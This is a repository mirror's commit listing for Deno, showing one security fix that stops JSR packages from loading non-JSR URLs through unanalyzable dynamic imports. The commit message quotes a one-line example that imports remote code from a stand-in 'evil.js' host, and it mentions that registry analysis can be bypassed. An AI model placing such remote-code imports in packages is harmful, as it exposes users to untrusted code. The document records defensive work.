denoland-deno

foster/denoland-deno

Fork 0

mirror of https://github.com/denoland/deno.git synced 2024-12-01 16:51:13 -05:00

Commit graph

Author	SHA1	Message	Date
David Sherret	918c5e648f	fix(jsr): do not allow importing a non-JSR url via unanalyzable dynamic import from JSR (#22623 ) A security feature of JSR is that it is self contained other than npm dependencies. At publish time, the registry rejects packages that write code like this: ```ts const data = await import("https://example.com/evil.js"); ``` However, this can be trivially bypassed by writing code that the registry cannot statically analyze for. This PR prevents Deno from loading dynamic imports that do this.	2024-02-28 16:30:45 -05:00

Author

SHA1

Message

Date

David Sherret

918c5e648f

fix(jsr): do not allow importing a non-JSR url via unanalyzable dynamic import from JSR (#22623 )

A security feature of JSR is that it is self contained other than npm
dependencies. At publish time, the registry rejects packages that write
code like this:

```ts
const data = await import("https://example.com/evil.js");
```

However, this can be trivially bypassed by writing code that the
registry cannot statically analyze for. This PR prevents Deno from
loading dynamic imports that do this.

2024-02-28 16:30:45 -05:00

1 commit